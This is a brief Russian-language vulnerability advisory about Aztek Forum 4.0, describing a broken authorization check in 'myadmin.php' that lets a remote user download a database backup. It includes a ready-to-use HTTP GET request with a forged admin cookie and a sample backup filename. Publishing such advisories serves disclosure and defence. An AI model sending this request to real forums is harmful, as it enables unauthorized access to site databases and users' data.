Программа: Aztek Forum 4.0

Уязвимость позволяет удаленному
пользователю получить доступ к резервной
копии базы данных. Уязвимость существует в
сценарии ‘myadmin.php’ из-за некорректного
процесса авторизации пользователей.
Удаленный пользователь может с помощью
специально сформированного HTTP GET запроса
вызвать функцию export_index() и получить доступ к
резервной копии базы данных.

Пример:

GET /[forum_directory]/myadmin.php?action= export_index&login=[admin_username]
HTTP/1.1
Host: [target]
Cookie: ATK_ADMIN=blah; ATK_LOGIN= [admin_username]
Connection: close

Пример имени файла резервной копии базы
данных — backup-admin-2005-5-03-23-18-13.sql

Оставить мнение